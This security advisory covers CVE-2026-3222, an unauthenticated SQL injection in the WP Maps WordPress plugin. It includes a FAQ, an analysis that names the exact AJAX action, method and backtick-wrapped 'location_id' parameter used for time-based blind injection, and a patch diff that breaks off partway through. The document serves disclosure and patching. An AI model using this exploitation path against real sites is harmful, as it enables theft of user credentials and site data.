What is CVE-2026-3222?

CVE-2026-3222 is a high-severity SQL injection vulnerability found in the WP Maps plugin for WordPress. It allows unauthenticated attackers to exploit the ‘location_id’ parameter to execute arbitrary SQL queries, potentially extracting sensitive information from the database.

How does the vulnerability work?

The vulnerability arises from the plugin’s database abstraction layer, which improperly handles user input wrapped in backticks. This allows attackers to bypass SQL escaping functions and inject SQL code through the ‘location_id’ parameter in AJAX requests.

Who is affected by this vulnerability?

Any WordPress site using the WP Maps plugin version 4.9.1 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Maps plugin installed on your WordPress site. If it is version 4.9.1 or earlier, it is susceptible to CVE-2026-3222.

How can I mitigate this vulnerability?

The recommended mitigation is to update the WP Maps plugin to version 4.9.2 or later, where the vulnerability has been patched. Additionally, consider implementing security measures such as web application firewalls.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality and integrity of the affected systems. Exploitation does not require authentication, making it particularly dangerous.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to extract sensitive data from the database, including user credentials and other confidential information. This can lead to further attacks and data breaches.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can craft an AJAX request with a malicious ‘location_id’ parameter containing SQL injection payloads. This allows the attacker to execute time-based blind SQL injection attacks against the vulnerable site.

What changes were made in the patched version?

In version 4.9.2, the plugin’s method for identifying column names was rewritten to prevent SQL injection. It now validates input against a whitelist of allowed column names, and AJAX calls are restricted to authenticated users only.

What is time-based blind SQL injection?

Time-based blind SQL injection is a technique where an attacker determines if an SQL query is successful based on the time it takes for the server to respond. By injecting a payload that causes a delay, the attacker can infer information about the database.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, regularly follow security advisories, subscribe to security mailing lists, and monitor the CVE database. It is also advisable to keep all plugins and themes updated to their latest versions.

What are the implications of not addressing this vulnerability?

Failing to address this vulnerability can lead to unauthorized access to sensitive data, which may result in data breaches, loss of user trust, and potential legal repercussions for non-compliance with data protection regulations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-3222: WP Maps <= 4.9.1 – Unauthenticated SQL Injection via 'location_id' Parameter (wp-google-map-plugin)

CVE ID CVE-2026-3222

Plugin wp-google-map-plugin

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 4.9.1

Patched Version 4.9.2

Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3222:
The vulnerability stems from two interconnected flaws in the WP Maps plugin. The root cause is the `FlipperCode_Model_Base::is_column()` method’s flawed logic for identifying column names. This method checks if a string is wrapped in backticks (`). If true, it treats the string as a column name and bypasses the `esc_sql()` escaping function. This allows attackers to inject arbitrary SQL by providing user input wrapped in backticks.

The exploitation vector is the unauthenticated AJAX handler `wpgmp_ajax_call`, registered via `wp_ajax_nopriv_wpgmp_ajax_call`. This handler allows calling arbitrary class methods, including `wpgmp_return_final_capability`. The `wpgmp_return_final_capability` function in `wp-google-map-plugin.php` (lines 232-258) receives the unsanitized `location_id` GET parameter. This parameter is passed to a database query constructed via the plugin’s model layer, which uses the vulnerable `is_column()` method. An attacker can send a request to `/wp-admin/admin-ajax.php` with `action=wpgmp_ajax_call`, `doaction=wpgmp_return_final_capability`, and a malicious `location_id` parameter wrapped in backticks containing a time-based SQL injection payload.

The patch addresses the issue in multiple locations. In `core/class.model.php`, the `is_column()` method is completely rewritten (lines 357-372). The new version no longer relies on backtick detection. Instead, it validates the input against a whitelist of actual database column names stored in `$this->allowed_columns`. This array is populated by a new `load_columns()` method that queries the database schema. The patch also adds `$this->load_columns()` calls to various model constructors (`model.location.php`, `model.map.php`, etc.) to initialize the whitelist. Additionally, the patch removes the `wp_ajax_nopriv_wpgmp_ajax_call` hook (line 74), restricting AJAX calls to authenticated users only. The `wpgmp_return_final_capability` function is also hardened with a direct database query using `$wpdb->prepare` and explicit integer casting for `location_id`.

If exploited, this vulnerability allows unauthenticated attackers to perform time-based blind SQL injection. Attackers can extract sensitive information from the WordPress database, including user credentials, plugin data, and other stored content. The CVSS score of 7.5 reflects the high impact on confidentiality and integrity with no authentication required.

Differential between vulnerable and patched code

Code Diff

--- a/wp-google-map-plugin/classes/wpgmp-pro-feature-ui.php
+++ b/wp-google-map-plugin/classes/wpgmp-pro-feature-ui.php
@@ -6,7 +6,15 @@

 	class WPGMP_Pro_Feature_UI_Modifier {

+		private $page_slug = false;
+
 		public function __construct() {
+
+			$page_name = isset($_GET['page']) ? sanitize_text_field($_GET['page']) : '';
+			if (strpos($page_name, 'wpgmp') !== false) {
+				$this->page_slug = true;
+			}
+
 			add_filter( 'wpgmp_form_footer_html', [ $this, 'append_pro_upgrade_modal_to_footer' ] );
 			add_filter( 'wpgmp_field_group_label', [ $this, 'add_pro_suffix_to_label' ], 10, 2 );
 			add_filter( 'wpgmp_input_label', [ $this, 'add_pro_suffix_to_label' ], 10, 2 );
@@ -18,65 +26,72 @@
 		}

 		public function wpgmp_template_directory($is_pro,$directory,$name,$atts) {
-
-			if(strstr($directory,'layout')) {
-				return true;
-			}
-
-			if(!strstr($directory,'default') and strstr($name,"item_skin")) {
-				return true;
+			if ($this->page_slug) {
+				if(strstr($directory,'layout')) {
+					return true;
+				}
+
+				if(!strstr($directory,'default') and strstr($name,"item_skin")) {
+					return true;
+				}
 			}

-
-
 			return $is_pro;

 		}
 		public function wpgmp_element_before_start_row($element,$name,$atts) {
-
-			if ( WPGMP_Helper::wpgmp_is_feature_available($name, 'google') ) {
-				$not_available_class = 'fc-feature-not-available';
-			} else{
-				$not_available_class = '';
+			if ($this->page_slug) {
+				if ( WPGMP_Helper::wpgmp_is_feature_available($name, 'google') ) {
+					$not_available_class = 'fc-feature-not-available';
+				} else{
+					$not_available_class = '';
+				}
+
+				if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] == 'group') {
+					$pro_feature_class = 'fc-pro-feature';
+					$element = '<dt><section id="'.$name.'" class="fc-form-group {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class.'">';
+				}
+
+				if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] != 'group' && $atts['type'] != 'submit' && $atts['type'] != 'button') {
+					$pro_feature_class_lock = 'fc-pro-feature-lock';
+					$element = '<section class="fc-form-group fc-row {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class_lock .'">';
+				}
 			}

-			if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] == 'group') {
-				$pro_feature_class = 'fc-pro-feature';
-				$element = '<dt><section id="'.$name.'" class="fc-form-group {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class.'">';
-			}
-
-			if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] != 'group' && $atts['type'] != 'submit' && $atts['type'] != 'button') {
-				$pro_feature_class_lock = 'fc-pro-feature-lock';
-				$element = '<section class="fc-form-group fc-row {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class_lock .'">';
-			}
-
 			return $element;

-			}
+		}

 		public function handle_pro_submit_button( $element, $name, $atts ) {
-			$no_sticky = ( isset( $atts['no-sticky'] ) && $atts['no-sticky'] === 'true' ) ? 'fc-no-sticky' : 'fc-sticky';
+			if ($this->page_slug) {
+				$no_sticky = ( isset( $atts['no-sticky'] ) && $atts['no-sticky'] === 'true' ) ? 'fc-no-sticky' : 'fc-sticky';

-			if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
-				$element = '<div class="' . esc_attr( $no_sticky ) . ' fc-form-footer">
-								<a href="javascript:void(0);" name="' . esc_attr( $name ) . '" class="fc-btn fc-btn-purple fc-modal-open">
-									<i class="wep-icon-crown wep-icon-lg"></i><span>' . esc_html__( 'Upgrade to Pro', 'wp-google-map-plugin' ) . '</span>
-								</a>
-							</div>';
+				if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
+					$element = '<div class="' . esc_attr( $no_sticky ) . ' fc-form-footer">
+									<a href="javascript:void(0);" name="' . esc_attr( $name ) . '" class="fc-btn fc-btn-purple fc-modal-open">
+										<i class="wep-icon-crown wep-icon-lg"></i><span>' . esc_html__( 'Upgrade to Pro', 'wp-google-map-plugin' ) . '</span>
+									</a>
+								</div>';
+				}
 			}
 			return $element;
 		}

 		public function add_pro_suffix_to_label( $value, $atts ) {
-			if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
-				$value .= ' <span class="fc-badge fc-badge-pro">' . esc_html__( 'PRO', 'wp-google-map-plugin' ) . '</span>';
+			if ($this->page_slug) {
+				if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
+					$value .= ' <span class="fc-badge fc-badge-pro">' . esc_html__( 'PRO', 'wp-google-map-plugin' ) . '</span>';
+				}
 			}
 			return $value;
 		}

 		public function append_pro_upgrade_modal_to_footer( $output ) {
-			$modal_html = WPGMP_Helper::wpgmp_render_pro_upgrade_modal();
-			return $output . $modal_html;
+			if ($this->page_slug) {
+				$modal_html = WPGMP_Helper::wpgmp_render_pro_upgrade_modal();
+				return $output . $modal_html;
+			}
+			return $output;
 		}
 	}
 }
--- a/wp-google-map-plugin/classes/wpgmp-security.php
+++ b/wp-google-map-plugin/classes/wpgmp-security.php
@@ -92,14 +92,21 @@
             $value = trim( $value );

              // Either map widht is a just a plain number.
-            if ( is_numeric( $value ) ) {
-                return absint( $value );
-            }
+

             // Or map width can be a number with % sign.
             $pattern = '/^([1-9][0-9]*)(%)?$/';
             if ( preg_match( $pattern, $value ) ) {
                 return $value;
+            }else if ( is_numeric( $value ) ) {
+                return absint( $value );
+            }else if( ! is_numeric( $value ) ){
+                $width = absint ( sanitize_text_field( $value ) );
+                if($width === 0){
+                    return '100%';
+                }else{
+                    return $width;
+                }
             }

             return '';
--- a/wp-google-map-plugin/core/class.model.php
+++ b/wp-google-map-plugin/core/class.model.php
@@ -40,6 +40,12 @@
 		 */
 		private $query = '';
 		/**
+		 * Table columns assoicated to the model class.
+		 *
+		 * @var string
+		 */
+		public $allowed_columns = [];
+		/**
 		 * Table name assoicated to the model class.
 		 *
 		 * @var string
@@ -156,6 +162,29 @@
 			return true;

 		}
+
+		/**
+		 * Load and cache the list of valid database columns for the current table.
+		 *
+		 * This method retrieves the
+		 */
+
+		protected function load_columns() {
+
+			if ( empty( $this->table ) ) {
+				return;
+			}
+
+			global $wpdb;
+
+			$columns = $wpdb->get_results( "DESCRIBE `{$this->table}`", ARRAY_A );
+
+			if ( ! empty( $columns ) ) {
+
+				$this->allowed_columns = array_column( $columns, 'Field' );
+
+			}
+		}
 		/**
 		 * Retrive records from database based on conditional array.
 		 *
@@ -189,15 +218,17 @@
 						}
 						if ( isset( $this->pog_attribute_type[ $fcv_array[ $i ][0] ]['db_attributes'] ) && 'NUMERIC' != $this->pog_attribute_type[ $fcv_array[ $i ][0] ]['db_attributes'][0] && 'SET' != $this->pog_attribute_type[ $fcv_array[ $i ][0] ]['db_attributes'][0] ) {
 							if ( 1 == $GLOBALS['configuration']['db_encoding'] ) {
-								$value        = $this->is_column( $fcv_array[ $i ][2] ) ? 'BASE64_DECODE(' . $fcv_array[ $i ][2] . ')' : "'" . $fcv_array[ $i ][2] . "'";
+
+								$value = $this->is_column( $fcv_array[ $i ][2] ) ? 'BASE64_DECODE(`' . trim( $fcv_array[ $i ][2], '`' ) . '`)'     : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
 								$this->query .= 'BASE64_DECODE(`' . $fcv_array[ $i ][0] . '`) ' . $fcv_array[ $i ][1] . ' ' . $value;
 							} else {
-								$value        = $this->is_column( $fcv_array[ $i ][2] ) ? $fcv_array[ $i ][2] : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
+
+								$value = $this->is_column( $fcv_array[ $i ][2] ) ? '`' . trim( $fcv_array[ $i ][2], '`' ) . '`' : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
 								$this->query .= '`' . $fcv_array[ $i ][0] . '` ' . $fcv_array[ $i ][1] . ' ' . $value;
 							}
 						} else {

-							$value = $this->is_column( $fcv_array[ $i ][2] ) ? $fcv_array[ $i ][2] : "'" . $fcv_array[ $i ][2] . "'";
+							$value = $this->is_column( $fcv_array[ $i ][2] ) ? '`' . trim( $fcv_array[ $i ][2], '`' ) . '`' : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
 							if ( 'in' == strtolower( $fcv_array[ $i ][1] ) ) {
 								$value = str_replace( "'", '', $value );
 								$value = '(' . $value . ')';
@@ -326,16 +357,18 @@
 		 * @param  string $value Column name.
 		 * @return boolean        True or False.
 		 */
-		public static function is_column( $value ) {
-
-			if ( strlen( $value ) > 2 ) {
-				if ( substr( $value, 0, 1 ) == '`' && substr( $value, strlen( $value ) - 1, 1 ) == '`' ) {
-					return true;
-				}
-				return false;
-			}
-
-			return false;
+		public function is_column( $value ) {
+		    if ( ! is_string( $value ) || empty( $this->allowed_columns ) ) {
+		        return false;
+		    }
+
+		    $clean = trim( $value, '`' );
+
+		    if ( ! preg_match( '/^[a-zA-Z0-9_]+$/', $clean ) ) {
+		        return false;
+		    }
+
+		    return in_array( $clean, $this->allowed_columns, true );
 		}
 		/**
 		 * Convert XML to array.
--- a/wp-google-map-plugin/core/class.tabular.php
+++ b/wp-google-map-plugin/core/class.tabular.php
@@ -522,11 +522,34 @@
 		 * @return string    Winner element.
 		 */
 		function usort_reorder( $a, $b ) {
-
-			$orderby = ( ! empty( $_GET['orderby'] ) ) ? sanitize_text_field( wp_unslash( $_GET['orderby'] ) ) : '';
-			$order   = ( ! empty( $_GET['order'] ) ) ? sanitize_text_field( wp_unslash( $_GET['order'] ) ) : 'asc';
-			$result  = strcmp( $a[ $orderby ], $b[ $orderby ] );
-			return ( 'asc' == $order ) ? $result : -$result;
+
+			/* ---- Allowed sortable columns (WHITELIST) ---- */
+			$sortable_columns = $this->get_sortable_columns();
+			$allowed_orderby  = array_keys( $sortable_columns );
+
+			/* ---- Validate orderby ---- */
+			$orderby = isset($_GET['orderby'])
+				? sanitize_key( wp_unslash( $_GET['orderby'] ) )
+				: $this->primary_col;
+
+			if ( ! in_array( $orderby, $allowed_orderby, true ) ) {
+				$orderby = $this->primary_col;
+			}
+
+			/* ---- Validate order ---- */
+			$order = isset($_GET['order'])
+				? strtolower( sanitize_key( wp_unslash( $_GET['order'] ) ) )
+				: 'asc';
+
+			$order = ( $order === 'desc' ) ? 'desc' : 'asc';
+
+			/* ---- Prevent undefined index notices ---- */
+			$value_a = isset($a[$orderby]) ? $a[$orderby] : '';
+			$value_b = isset($b[$orderby]) ? $b[$orderby] : '';
+
+			$result = strcmp( (string) $value_a, (string) $value_b );
+
+			return ( $order === 'asc' ) ? $result : -$result;
 		}
 		/**
 		 * Get bulk actions.
@@ -703,117 +726,137 @@
 		/**
 		 * Prepare records before print.
 		 */
-		function prepare_items() {

+		function prepare_items() {
+
 			global $wpdb;
+
 			$columns               = $this->get_columns();
 			$hidden                = array();
 			$sortable              = $this->get_sortable_columns();
 			$this->_column_headers = array( $columns, $hidden, $sortable );
+
 			$this->process_bulk_action();
+
 			$query = ( empty( $this->sql ) ) ? 'SELECT * FROM ' . $this->table : $this->sql;
-			if( isset( $_GET['page'] ) && !empty( $_GET['page'] ) ){
-				$query = apply_filters('fc_manage_page_basic_query', $query , sanitize_text_field( wp_unslash( $_GET['page'] ) ) ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
-
-			}
-
-			if ( isset( $_GET['page'] ) && isset( $_REQUEST['s'] ) ) {
-				$page = sanitize_text_field( wp_unslash( $_GET['page'] ) );
-				$search = sanitize_text_field( wp_unslash( $_REQUEST['s'] ) );
-			} else {
-				$page = '';
-				$search = '';
+
+			if ( isset( $_GET['page'] ) && ! empty( $_GET['page'] ) ) {
+				$query = apply_filters(
+					'fc_manage_page_basic_query',
+					$query,
+					sanitize_text_field( wp_unslash( $_GET['page'] ) )
+				);
 			}
-
-			if(!$this->noSql){
-
-				if ( $this->admin_listing_page_name == $page && '' != $search ) {
-
+
+			$page   = isset($_GET['page']) ? sanitize_text_field( wp_unslash($_GET['page']) ) : '';
+			$search = isset($_REQUEST['s']) ? sanitize_text_field( wp_unslash($_REQUEST['s']) ) : '';
+
+			if ( ! $this->noSql ) {
+
+				/* ================= SEARCH ================= */
+				if ( $this->admin_listing_page_name == $page && '' !== $search ) {
+
 					$s = $search;
-					$first_column = '';
-					$remaining_columns  = array();
 					$prepare_query_with_placeholders = '';
 					$prepare_args_values = array();
-
+					$first = true;
+
 					foreach ( $this->columns as $column_name => $columnlabel ) {
-
-						if ( "{$this->primary_col}" == $column_name ) {
-							 continue;
+
+						if ( $column_name === $this->primary_col ) {
+							continue;
+						}
+
+						if (
+							isset($this->searchExclude)
+							&& ! empty($this->searchExclude)
+							&& in_array($column_name, $this->searchExclude, true)
+						) {
+							continue;
+						}
+
+						$prepare_args_values[] = '%' . $wpdb->esc_like( $s ) . '%';
+
+						if ( $first ) {
+							$prepare_query_with_placeholders .= " WHERE {$column_name} LIKE %s";
+							$first = false;
 						} else {
-
-							if ( empty( $first_column ) ) {
-
-								$first_column = $column_name;
-								$prepare_args_values[] = $wpdb->esc_like($s);
-								$prepare_query_with_placeholders = " WHERE {$column_name} LIKE '%%%s%%'";
-
-
-							} else {
-
-								$remaining_columns[] = $column_name;
-								if ( isset($this->searchExclude) && !empty($this->searchExclude) && !in_array( $column_name, $this->searchExclude ) ) {
-									$prepare_args_values[] = $wpdb->esc_like($s);
-									$prepare_query_with_placeholders .= " or {$column_name} LIKE '%%%s%%'";
-
-								}
-
-								if(!isset($this->searchExclude) ){
-									$prepare_args_values[] = $wpdb->esc_like($s);
-									$prepare_query_with_placeholders .= " or {$column_name} LIKE '%%%s%%'";
-								}
-							}
+							$prepare_query_with_placeholders .= " OR {$column_name} LIKE %s";
 						}
 					}
-
-					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $this->table and $this->primary_col are internal class properties
-					$this->data = $wpdb->get_results(  $wpdb->prepare( 'SELECT * FROM '.$this->table. $prepare_query_with_placeholders. ' order by '.$this->primary_col.' desc', $prepare_args_values )  );
-
-				}
-				else if ( isset($_GET['orderby']) && ! empty( $_GET['orderby'] ) && isset($_GET['order']) && ! empty( $_GET['order'] ) ) {
-
-					$_GET['orderby'] = sanitize_text_field( $_GET['orderby'] );
-					$_GET['order'] = sanitize_text_field( $_GET['order'] );
-					$orderby = ( !empty( $_GET['orderby'] ) ) ? wp_unslash( $_GET['orderby'] ) : $this->primary_col;
-					$order   = ( !empty( $_GET['order'] ) ) ? wp_unslash( $_GET['order'] ) : 'asc';
-
-						$query_to_run  = $query;
-						$query_to_run .= " order by {$orderby} {$order}";
-						// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $query_to_run is safe
-						$this->data = $wpdb->get_results( $query_to_run );
-
-					}
-				 else {
-
-						$query_to_run = $query;
-						$query_to_run .= " order by {$this->primary_col} desc";
-						$query_to_run = apply_filters('fc_manage_page_default_query', $query_to_run , sanitize_text_field( wp_unslash( $_GET['page'] ) ) ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
-
-						// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $query_to_run is safe
-						$this->data = $wpdb->get_results( $query_to_run );
-
+
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
+					$this->data = $wpdb->get_results(
+						$wpdb->prepare(
+							'SELECT * FROM ' . $this->table . $prepare_query_with_placeholders .
+							' ORDER BY ' . $this->primary_col . ' DESC',
+							$prepare_args_values
+						)
+					);
+
+				/* ================= SAFE ORDER BY ================= */
+				} elseif ( isset($_GET['orderby']) && isset($_GET['order']) ) {
+
+					/* ---- WHITELIST ORDERBY ---- */
+					$sortable_columns = $this->get_sortable_columns();
+					$allowed_orderby  = array_keys( $sortable_columns );
+
+					$orderby = sanitize_key( wp_unslash( $_GET['orderby'] ) );
+
+					if ( ! in_array( $orderby, $allowed_orderby, true ) ) {
+						$orderby = $this->primary_col;
 					}
-
-			}else{
-
-				if(isset($this->external) && !empty($this->external)){
-					$this->data   = $this->external;
+
+					/* ---- STRICT ORDER VALIDATION ---- */
+					$order = strtolower( sanitize_key( wp_unslash( $_GET['order'] ) ) );
+					$order = ( $order === 'desc' ) ? 'DESC' : 'ASC';
+
+					$query_to_run  = $query;
+					$query_to_run .= " ORDER BY {$orderby} {$order}";
+
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- identifiers are whitelist validated
+					$this->data = $wpdb->get_results( $query_to_run );
+
+				/* ================= DEFAULT ================= */
+				} else {
+
+					$query_to_run  = $query;
+					$query_to_run .= " ORDER BY {$this->primary_col} DESC";
+
+					$query_to_run = apply_filters(
+						'fc_manage_page_default_query',
+						$query_to_run,
+						$page
+					);
+
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
+					$this->data = $wpdb->get_results( $query_to_run );
 				}
-
-			}
-
-			$current_page = apply_filters('fc_tabular_set_pagination_page',$this->get_pagenum()) ; // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
-
-			$total_items  = count( $this->data );
-			if ( is_array( $this->data ) && ! empty( $this->data ) ) {
-				$this->found_data = @array_slice( $this->data, ( ( $current_page - 1 ) * $this->per_page ), $this->per_page );
+
 			} else {
-				$this->found_data = array();
+
+				if ( isset($this->external) && ! empty($this->external) ) {
+					$this->data = $this->external;
+				}
 			}
-
-			$p_data = array( 'total_items' => $total_items,	'per_page' => $this->per_page );
-			$this->set_pagination_args($p_data);
+
+			$current_page = apply_filters(
+				'fc_tabular_set_pagination_page',
+				$this->get_pagenum()
+			);
+
+			$total_items = count( $this->data );
+
+			$this->found_data = ( is_array($this->data) && ! empty($this->data) )
+				? array_slice( $this->data, ( ($current_page - 1) * $this->per_page ), $this->per_page )
+				: array();
+
+			$this->set_pagination_args(array(
+				'total_items' => $total_items,
+				'per_page'    => $this->per_page,
+			));
+
 			$this->items = $this->found_data;
-
 		}

 	}
--- a/wp-google-map-plugin/modules/drawing/model.drawing.php
+++ b/wp-google-map-plugin/modules/drawing/model.drawing.php
@@ -36,21 +36,7 @@
 		}

 		function save() {
-			global  $_POST;
-
-			if ( isset( $_POST['map_id'] ) ) {
-				$map_id                                       = intval( wp_unslash( $_POST['map_id'] ) );
-				$data['polylines'][0]                         = $_POST['shapes_values'];
-				$infowindow['map_polyline_setting']['shapes'] = serialize( $data );
-				$in_loc_data                                  = array(
-					'map_polyline_setting' => $infowindow['map_polyline_setting']['shapes'],
-				);
-				$where['map_id']                              = $map_id;
-
-				FlipperCode_Database::insert_or_update( TBL_MAP, $in_loc_data, $where );
-			}
-
-			unset( $_POST['operation'] );
+
 		}
 	}
 }
--- a/wp-google-map-plugin/modules/group_map/model.group_map.php
+++ b/wp-google-map-plugin/modules/group_map/model.group_map.php
@@ -32,6 +32,7 @@
 		function __construct() {
 			$this->table     = TBL_GROUPMAP;
 			$this->unique    = 'group_map_id';
+			$this->load_columns();
 			$this->validations = [
 				'group_map_title' => [
 					'req'     => esc_html__( 'Please enter title for marker category.', 'wp-google-map-plugin' ),
--- a/wp-google-map-plugin/modules/location/model.location.php
+++ b/wp-google-map-plugin/modules/location/model.location.php
@@ -22,6 +22,7 @@
 		public function __construct() {
 			$this->table     = TBL_LOCATION;
 			$this->unique    = 'location_id';
+			$this->load_columns();
 			$this->validations = array(
 				'location_title'   => array(
 					'req'     => esc_html__( 'Please enter location title.', 'wp-google-map-plugin' ),
--- a/wp-google-map-plugin/modules/map/model.map.php
+++ b/wp-google-map-plugin/modules/map/model.map.php
@@ -49,6 +49,7 @@
 			);
 			$this->table  = TBL_MAP;
 			$this->unique = 'map_id';
+			$this->load_columns();
 		}
 		/**
 		 * Admin menu for CRUD Operation
--- a/wp-google-map-plugin/modules/permissions/model.permissions.php
+++ b/wp-google-map-plugin/modules/permissions/model.permissions.php
@@ -38,66 +38,7 @@
 		 * Save Permissions
 		 */
 		function save() {
-			global $_POST;
-			if ( isset( $_REQUEST['_wpnonce'] ) ) {
-				$nonce = sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) ); }
-
-			if ( isset( $nonce ) and ! wp_verify_nonce( $nonce, 'wpgmp-nonce' ) ) {
-
-				die( 'Cheating...' );
-
-			}
-			global $wp_roles;
-			$wpgmp_roles = $wp_roles->get_names();
-			unset( $wpgmp_roles['administrator'] );
-			$wpgmp_permissions = array(
-				'wpgmp_admin_overview'   => esc_html__('Map Overview','wp-google-map-plugin'),
-				'wpgmp_form_location'    => esc_html__('Add Locations','wp-google-map-plugin'),
-				'wpgmp_manage_location'  => esc_html__('Manage Locations','wp-google-map-plugin'),
-				'wpgmp_import_location'  => esc_html__('Import Locations','wp-google-map-plugin'),
-				'wpgmp_form_map'         => esc_html__('Create Map','wp-google-map-plugin'),
-				'wpgmp_manage_map'       => esc_html__('Manage Map','wp-google-map-plugin'),
-				'wpgmp_manage_drawing'   => esc_html__('Drawing','wp-google-map-plugin'),
-				'wpgmp_form_group_map'   => esc_html__('Add Marker Category','wp-google-map-plugin'),
-				'wpgmp_manage_group_map' => esc_html__('Manage Marker Category','wp-google-map-plugin'),
-				'wpgmp_form_route'       => esc_html__('Add Routes','wp-google-map-plugin'),
-				'wpgmp_manage_route'     => esc_html__('Manage Routes','wp-google-map-plugin'),
-				'wpgmp_settings'         => esc_html__('Settings','wp-google-map-plugin'),
-			);
-			$this->verify( $_POST );
-
-			if ( is_array( $this->errors ) and ! empty( $this->errors ) ) {
-				$this->throw_errors();
-			}
-			if ( isset( $_POST['wpgmp_save_permission'] ) ) {
-
-				if ( isset( $_POST['wpgmp_map_permissions'] ) ) {
-					$wpgmp_map_permissions = wp_unslash( $_POST['wpgmp_map_permissions'] );
-				} else {
-					$wpgmp_map_permissions = array();
-				}
-
-				if ( ! empty( $wpgmp_roles ) ) {
-					foreach ( $wpgmp_roles as $wpgmp_role_key => $wpgmp_role_value ) {
-						if ( $wpgmp_role_key == 'administrator' && is_admin() && current_user_can( 'manage_options' ) ) {
-							continue; }
-
-						$role = get_role( $wpgmp_role_key );
-
-						if ( ! empty( $wpgmp_permissions ) ) {
-							foreach ( $wpgmp_permissions as $wpgmp_mkey => $wpgmp_mvalue ) {
-								if ( isset( $wpgmp_map_permissions[ $wpgmp_role_key ][ $wpgmp_mkey ] ) ) {
-									$role->add_cap( $wpgmp_mkey );
-								} else {
-									$role->remove_cap( $wpgmp_mkey );
-								}
-							}
-						}
-					}
-				}
-			}
-			$response['success'] = esc_html__( 'Permissions were saved successfully.', 'wp-google-map-plugin' );
-			return $response;
+
 		}

 	}
--- a/wp-google-map-plugin/modules/permissions/views/manage.php
+++ b/wp-google-map-plugin/modules/permissions/views/manage.php
@@ -54,7 +54,7 @@
 					'current' => ( ( @array_key_exists( $wpgmp_mkey, $urole->capabilities ) == true ) ? 'true' : 'false' ),
 					'before'  => '<div class="fc-1">',
 					'after'   => '</div>',
-					'class'   => 'fc-form-check-input chkbox_class',
+					'class'   => 'fc-form-check-input chkbox_class wpgmp_author_permission',
 				)
 			);
 		}
--- a/wp-google-map-plugin/modules/route/model.route.php
+++ b/wp-google-map-plugin/modules/route/model.route.php
@@ -20,6 +20,7 @@
 		public function __construct() {
 			$this->table  = TBL_ROUTES;
 			$this->unique = 'route_id';
+			$this->load_columns();
 			$this->validations = array(
 				'route_title' => array(
 					'req'     => esc_html__( 'Please enter route title.', 'wp-google-map-plugin' ),
@@ -55,80 +56,15 @@
 		}

 		public function fetch( $where = array() ) {
-			$routes = $this->get( $this->table, $where );
-
-			foreach ( (array) $routes as $route ) {
-				$route->route_way_points  = maybe_unserialize( $route->route_way_points );
-				$route->extensions_fields = maybe_unserialize( $route->extensions_fields );
-			}
-
-			return apply_filters( 'wpgmp_route_results', $routes, $where );
+
 		}

 		public function save() {
-			if ( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( sanitize_text_field( $_REQUEST['_wpnonce'] ), 'wpgmp-nonce' ) ) {
-				wp_die( esc_html__( 'You are not allowed to save changes!', 'wp-google-map-plugin' ) );
-			}
-
-			$this->verify( $_POST );
-			$this->errors = apply_filters( 'wpgmp_route_validation', $this->errors, $_POST );
-
-			$waypoints = ! empty( $_POST['route_way_points'] ) ? explode( ',', sanitize_text_field( $_POST['route_way_points'] ) ) : array();
-			if ( count( $waypoints ) > 8 ) {
-				$this->errors[] = esc_html__( 'Please do not select more than 8 locations.', 'wp-google-map-plugin' );
-			}
-
-			if ( ! empty( $this->errors ) ) {
-				$this->throw_errors();
-			}
-
-			$data = array(
-				'route_title'              => sanitize_text_field( $_POST['route_title'] ?? '' ),
-				'route_stroke_color'       => sanitize_text_field( $_POST['route_stroke_color'] ?? '' ),
-				'route_stroke_opacity'     => sanitize_text_field( $_POST['route_stroke_opacity'] ?? '' ),
-				'route_stroke_weight'      => intval( $_POST['route_stroke_weight'] ?? 0 ),
-				'route_travel_mode'        => sanitize_text_field( $_POST['route_travel_mode'] ?? '' ),
-				'route_unit_system'        => sanitize_text_field( $_POST['route_unit_system'] ?? '' ),
-				'route_marker_draggable'   => sanitize_text_field( $_POST['route_marker_draggable'] ?? '' ),
-				'route_optimize_waypoints' => sanitize_text_field( $_POST['route_optimize_waypoints'] ?? '' ),
-				'route_start_location'     => intval( $_POST['route_start_location'] ?? 0 ),
-				'route_end_location'       => intval( $_POST['route_end_location'] ?? 0 ),
-				'route_way_points'         => serialize( $waypoints ),
-				'extensions_fields'        => serialize( wp_unslash( $_POST['extensions_fields'] ?? array() ) ),
-			);
-
